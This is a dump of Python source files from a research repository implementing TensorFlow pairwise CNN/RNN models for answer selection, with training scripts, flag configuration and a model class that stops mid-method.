| repo_name (string, 400 values) | branch_name (string, 4 values) | file_content (string, 16 to 72.5k chars) | language (string, 1 value) | num_lines (int64, 1 to 1.66k) | avg_line_length (float64, 6 to 85) | max_line_length (int64, 9 to 949) | path (string, 5 to 103 chars) | alphanum_fraction (float64, 0.29 to 0.89) | alpha_fraction (float64, 0.27 to 0.89) |
|---|---|---|---|---|---|---|---|---|---|
| shuishen112/pairwise-rnn | refs/heads/master |
import data_helper
import time
import datetime
import os
import tensorflow as tf
import numpy as np
import evaluation
from models.QA_CNN_pairwise import QA_CNN_extend  # QA_CNN_extend is instantiated in main() below but was not imported
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
timeDay = time.strftime("%Y%m%d", timeArray)
print (timeStamp)
def main(args):
args._parse_flags()
print("\nParameters:")
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
log_dir = 'log/'+ timeDay
if not os.path.exists(log_dir):
os.makedirs(log_dir)
data_file = log_dir + '/test_' + args.data + timeStamp
precision = data_file + 'precise'
print('load data ...........')
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev])
print('the number of words',len(alphabet))
print('get embedding')
if args.data=="quora":
embedding = data_helper.get_embedding(alphabet,language="cn")
else:
embedding = data_helper.get_embedding(alphabet)
with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model = QA_CNN_extend(max_input_left = q_max_sent_length,
max_input_right = a_max_sent_length,
batch_size = args.batch_size,
vocab_size = len(alphabet),
embedding_size = args.embedding_dim,
filter_sizes = list(map(int, args.filter_sizes.split(","))),
num_filters = args.num_filters,
hidden_size = args.hidden_size,
dropout_keep_prob = args.dropout_keep_prob,
embeddings = embedding,
l2_reg_lambda = args.l2_reg_lambda,
trainable = args.trainable,
pooling = args.pooling,
conv = args.conv)
model.build_graph()
sess.run(tf.global_variables_initializer())
def train_step(model,sess,batch):
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.answer_negative:data[2],
model.q_mask:data[3],
model.a_mask:data[4],
model.a_neg_mask:data[5]
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[model.train_op, model.merged,model.global_step,model.loss, model.accuracy,model.score12,model.score13, model.see],
feed_dict)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
def predict(model,sess,batch,test):
scores = []
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.q_mask:data[2],
model.a_mask:data[3]
}
score = sess.run(
model.score12,
feed_dict)
scores.extend(score)
return np.array(scores[:len(test)])
for i in range(args.num_epoches):
datas = data_helper.get_mini_batch(train,alphabet,args.batch_size)
train_step(model,sess,datas)
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
print(len(predicted_test))
print(len(test))
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
print('map_mrr test',map_mrr_test)
| Python | 116 | 36.043102 | 159 | /main.py | 0.553088 | 0.546842 |
| shuishen112/pairwise-rnn | refs/heads/master |
class Singleton(object):
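# Holds a single cached tf.app.flags.FLAGS configuration. The len(...) <= 2 check in the
# get_*_flag methods below skips re-defining flags when they have already been registered.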
__instance=None
def __init__(self):
pass
def getInstance(self):
if Singleton.__instance is None:
# Singleton.__instance=object.__new__(cls,*args,**kwd)
Singleton.__instance=self.get_test_flag()
print("build FLAGS over")
return Singleton.__instance
def get_test_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_rnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
# flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('data','trec','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_cnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_qcnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "qcnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','mean','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_8008_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",200, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 1e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 250, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
if __name__=="__main__":
args=Singleton().get_test_flag()
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
| Python | 197 | 60.426395 | 121 | /config.py | 0.627396 | 0.597571 |
| shuishen112/pairwise-rnn | refs/heads/master |
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime,os
import models
import numpy as np
import evaluation
import sys
import logging
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.makedirs(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_qcnn_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("innitilize over")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
# ckpt = tf.train.get_checkpoint_state("checkpoint")
# if ckpt and ckpt.model_checkpoint_path:
# # Restores from checkpoint
# saver.restore(sess, ckpt.model_checkpoint_path)
# if os.path.exists("model") :
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
# variable_averages = tf.train.ExponentialMovingAverage( model)
# variables_to_restore = variable_averages.variables_to_restore()
# saver = tf.train.Saver(variables_to_restore)
# for name in variables_to_restore:
# print(name)
sess.run(tf.global_variables_initializer())
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
best_p1=0
for i in range(args.num_epoches):
for data in train_data_loader(train,alphabet,args.batch_size,model=model,sess=sess):
# for data in data_helper.getBatch48008(train,alphabet,args.batch_size):
_, summary, step, loss, accuracy,score12, score13, see = model.train(sess,data)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
logger.info("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
#<<<<<<< HEAD
#
#
# if i>0 and i % 5 ==0:
# test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
#
# predicted_test = predict(model,sess,test_datas,test)
# map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
#
# logger.info('map_mrr test' +str(map_mrr_test))
# print('map_mrr test' +str(map_mrr_test))
#
# test_datas = data_helper.get_mini_batch_test(dev,alphabet,args.batch_size)
# predicted_test = predict(model,sess,test_datas,dev)
# map_mrr_test = evaluation.evaluationBypandas(dev,predicted_test)
#
# logger.info('map_mrr dev' +str(map_mrr_test))
# print('map_mrr dev' +str(map_mrr_test))
# map,mrr,p1 = map_mrr_test
# if p1>best_p1:
# best_p1=p1
# filename= "checkpoint/"+args.data+"_"+str(p1)+".model"
# save_path = saver.save(sess, filename)
# # load_path = saver.restore(sess, model_path)
#
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
#
#
#=======
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
logger.info('map_mrr test' +str(map_mrr_test))
print('epoch '+ str(i) + 'map_mrr test' +str(map_mrr_test))
| Python | 164 | 35.829269 | 161 | /run.py | 0.628704 | 0.62142 |
| shuishen112/pairwise-rnn | refs/heads/master |
#coding:utf-8
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn
import models.blocks as blocks
# model_type :apn or qacnn
class QA_CNN_extend(object):
# def __init__(self,max_input_left,max_input_right,batch_size,vocab_size,embedding_size,filter_sizes,num_filters,hidden_size,
# dropout_keep_prob = 1,learning_rate = 0.001,embeddings = None,l2_reg_lambda = 0.0,trainable = True,pooling = 'attentive',conv = 'narrow'):
#
# """
# QA_RNN model for question answering
#
# Args:
# self.dropout_keep_prob: dropout rate
# self.num_filters : number of filters
# self.para : parameter list
# self.extend_feature_dim : my extend feature dimension
# self.max_input_left : the length of question
# self.max_input_right : the length of answer
# self.pooling : pooling strategy :max pooling or attentive pooling
#
# """
# self.dropout_keep_prob = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
# self.num_filters = num_filters
# self.embeddings = embeddings
# self.embedding_size = embedding_size
# self.batch_size = batch_size
# self.filter_sizes = filter_sizes
# self.l2_reg_lambda = l2_reg_lambda
# self.para = []
#
# self.max_input_left = max_input_left
# self.max_input_right = max_input_right
# self.trainable = trainable
# self.vocab_size = vocab_size
# self.pooling = pooling
# self.total_num_filter = len(self.filter_sizes) * self.num_filters
#
# self.conv = conv
# self.pooling = 'traditional'
# self.learning_rate = learning_rate
#
# self.hidden_size = hidden_size
#
# self.attention_size = 100
def __init__(self,opt):
for key,value in opt.items():
self.__setattr__(key,value)
self.attention_size = 100
self.pooling = 'mean'
self.total_num_filter = len(self.filter_sizes) * self.num_filters
self.para = []
self.dropout_keep_prob_holder = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
def create_placeholder(self):
print(('Create placeholders'))
# the sentence length varies from batch to batch, so both dimensions are left as None
self.question = tf.placeholder(tf.int32,[None,None],name = 'input_question')
self.max_input_left = tf.shape(self.question)[1]
self.batch_size = tf.shape(self.question)[0]
self.answer = tf.placeholder(tf.int32,[None,None],name = 'input_answer')
self.max_input_right = tf.shape(self.answer)[1]
self.answer_negative = tf.placeholder(tf.int32,[None,None],name = 'input_right')
# self.q_mask = tf.placeholder(tf.int32,[None,None],name = 'q_mask')
# self.a_mask = tf.placeholder(tf.int32,[None,None],name = 'a_mask')
# self.a_neg_mask = tf.placeholder(tf.int32,[None,None],name = 'a_neg_mask')
def add_embeddings(self):
print( 'add embeddings')
if self.embeddings is not None:
print( "load embedding")
W = tf.Variable(np.array(self.embeddings),name = "W" ,dtype="float32",trainable = self.trainable)
else:
print( "random embedding")
W = tf.Variable(tf.random_uniform([self.vocab_size, self.embedding_size], -1.0, 1.0),name="W",trainable = self.trainable)
self.embedding_W = W
# self.overlap_W = tf.Variable(a,name="W",trainable = True)
self.para.append(self.embedding_W)
self.q_embedding = tf.nn.embedding_lookup(self.embedding_W,self.question)
self.a_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer)
self.a_neg_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer_negative)
#real length
self.q_len,self.q_mask = blocks.length(self.question)
self.a_len,self.a_mask = blocks.length(self.answer)
self.a_neg_len,self.a_neg_mask = blocks.length(self.answer_negative)
def convolution(self):
print( 'convolution:wide_convolution')
self.kernels = []
for i,filter_size in enumerate(self.filter_sizes):
with tf.name_scope('conv-max-pool-%s' % filter_size):
filter_shape = [filter_size,self.embedding_size,1,self.num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev = 0.1), name="W")
b = tf.Variable(tf.constant(0.0, shape=[self.num_filters]), name="b")
self.kernels.append((W,b))
self.para.append(W)
self.para.append(b)
embeddings = [self.q_embedding,self.a_embedding,self.a_neg_embedding]
self.q_cnn,self.a_cnn,self.a_neg_cnn = [self.wide_convolution(tf.expand_dims(embedding,-1)) for embedding in embeddings]
#convolution
def pooling_graph(self):
if self.pooling == 'mean':
self.q_pos_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.q_neg_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.a_pos_cnn = self.mean_pooling(self.a_cnn,self.a_mask)
self.a_neg_cnn = self.mean_pooling(self.a_neg_cnn,self.a_neg_mask)
elif self.pooling == 'attentive':
self.q_pos_cnn,self.a_pos_cnn = self.attentive_pooling(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.attentive_pooling(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'position':
self.q_pos_cnn,self.a_pos_cnn = self.position_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.position_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'traditional':
print( self.pooling)
print(self.q_cnn)
self.q_pos_cnn,self.a_pos_cnn = self.traditional_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.traditional_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
def para_initial(self):
# print(("---------"))
# self.W_qp = tf.Variable(tf.truncated_normal(shape = [self.hidden_size * 2,1],stddev = 0.01,name = 'W_qp'))
self.U = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'U'))
self.W_hm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_hm'))
self.W_qm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_qm'))
self.W_ms = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,1],stddev = 0.01,name = 'W_ms'))
self.M_qi = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.embedding_size],stddev = 0.01,name = 'M_qi'))
def mean_pooling(self,conv,mask):
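# Average the convolution features over the time axis. The mask-weighted variant is left
# commented out below, so padded positions are currently included in the mean.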
conv = tf.squeeze(conv,2)
print( tf.expand_dims(tf.cast(mask,tf.float32),-1))
# conv_mask = tf.multiply(conv,tf.expand_dims(tf.cast(mask,tf.float32),-1))
# self.see = conv_mask
# print( conv_mask)
return tf.reduce_mean(conv,axis = 1)
def attentive_pooling(self,input_left,input_right,q_mask,a_mask):
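# Attentive pooling: build a soft alignment G = tanh(Q * U * A^T) between question and answer
# positions, max-pool G along rows/columns to get attention weights over each side, mask out
# padding, and return the attention-weighted question and answer representations.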
Q = tf.squeeze(input_left,axis = 2)
A = tf.squeeze(input_right,axis = 2)
print( Q)
print( A)
# Q = tf.reshape(input_left,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,len(self.filter_sizes) * self.num_filters],name = 'A')
# G = tf.tanh(tf.matmul(tf.matmul(Q,self.U),\
# A,transpose_b = True),name = 'G')
first = tf.matmul(tf.reshape(Q,[-1,len(self.filter_sizes) * self.num_filters]),self.U)
second_step = tf.reshape(first,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters])
result = tf.matmul(second_step,tf.transpose(A,perm = [0,2,1]))
print( second_step)
print( tf.transpose(A,perm = [0,2,1]))
# print( 'result',result)
G = tf.tanh(result)
# G = result
# column-wise pooling ,row-wise pooling
row_pooling = tf.reduce_max(G,1,True,name = 'row_pooling')
col_pooling = tf.reduce_max(G,2,True,name = 'col_pooling')
self.attention_q = tf.nn.softmax(col_pooling,1,name = 'attention_q')
self.attention_q_mask = tf.multiply(self.attention_q,tf.expand_dims(tf.cast(q_mask,tf.float32),-1))
self.attention_a = tf.nn.softmax(row_pooling,name = 'attention_a')
self.attention_a_mask = tf.multiply(self.attention_a,tf.expand_dims(tf.cast(a_mask,tf.float32),1))
self.see = G
R_q = tf.reshape(tf.matmul(Q,self.attention_q_mask,transpose_a = 1),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_q')
R_a = tf.reshape(tf.matmul(self.attention_a_mask,A),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_a')
return R_q,R_a
def traditional_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
input_left_mask = tf.multiply(input_left, tf.expand_dims(tf.cast(q_mask,tf.float32),2))
Q = tf.reduce_mean(input_left_mask,1)
a_shape = tf.shape(input_right)
A = tf.reshape(input_right,[-1,self.total_num_filter])
m_t = tf.nn.tanh(tf.reshape(tf.matmul(A,self.W_hm),[-1,a_shape[1],self.total_num_filter]) + tf.expand_dims(tf.matmul(Q,self.W_qm),1))
f_attention = tf.exp(tf.reshape(tf.matmul(tf.reshape(m_t,[-1,self.total_num_filter]),self.W_ms),[-1,a_shape[1],1]))
self.f_attention_mask = tf.multiply(f_attention,tf.expand_dims(tf.cast(a_mask,tf.float32),2))
self.f_attention_norm = tf.divide(self.f_attention_mask,tf.reduce_sum(self.f_attention_mask,1,keep_dims = True))
self.see = self.f_attention_norm
a_attention = tf.reduce_sum(tf.multiply(input_right,self.f_attention_norm),1)
return Q,a_attention
def position_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
# Q = tf.reshape(input_left,[-1,self.max_input_left,self.hidden_size*2],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,self.hidden_size*2],name = 'A')
Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
QU = tf.matmul(Q,self.U)
QUA = tf.multiply(tf.expand_dims(QU,1),input_right)
self.attention_a = tf.cast(tf.argmax(QUA,2)
,tf.float32)
# q_shape = tf.shape(input_left)
# Q_1 = tf.reshape(input_left,[-1,self.total_num_filter])
# QU = tf.matmul(Q_1,self.U)
# QU_1 = tf.reshape(QU,[-1,q_shape[1],self.total_num_filter])
# A_1 = tf.transpose(input_right,[0,2,1])
# QUA = tf.matmul(QU_1,A_1)
# QUA = tf.nn.l2_normalize(QUA,1)
# G = tf.tanh(QUA)
# Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
# # self.Q_mask = tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2))
# row_pooling = tf.reduce_max(G,1,name="row_pooling")
# col_pooling = tf.reduce_max(G,2,name="col_pooling")
# self.attention_a = tf.nn.softmax(row_pooling,1,name = "attention_a")
self.attention_a_mask = tf.multiply(self.attention_a,tf.cast(a_mask,tf.float32))
self.see = self.attention_a
self.attention_a_norm = tf.divide(self.attention_a_mask,tf.reduce_sum(self.attention_a_mask,1,keep_dims =True))
self.r_a = tf.reshape(tf.matmul(tf.transpose(input_right,[0,2,1]) ,tf.expand_dims(self.attention_a_norm,2)),[-1,self.total_num_filter])
return Q ,self.r_a
def create_loss(self):
with tf.name_scope('score'):
self.score12 = self.getCosine(self.q_pos_cnn,self.a_pos_cnn)
self.score13 = self.getCosine(self.q_neg_cnn,self.a_neg_cnn)
l2_loss = tf.constant(0.0)
for p in self.para:
l2_loss += tf.nn.l2_loss(p)
with tf.name_scope("loss"):
self.losses = tf.maximum(0.0, tf.subtract(0.05, tf.subtract(self.score12, self.score13)))
self.loss = tf.reduce_sum(self.losses) + self.l2_reg_lambda * l2_loss
tf.summary.scalar('loss', self.loss)
# Accuracy
with tf.name_scope("accuracy"):
self.correct = tf.equal(0.0, self.losses)
self.accuracy = tf.reduce_mean(tf.cast(self.correct, "float"), name="accuracy")
tf.summary.scalar('accuracy', self.accuracy)
def create_op(self):
self.global_step = tf.Variable(0, name = "global_step", trainable = False)
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.grads_and_vars = self.optimizer.compute_gradients(self.loss)
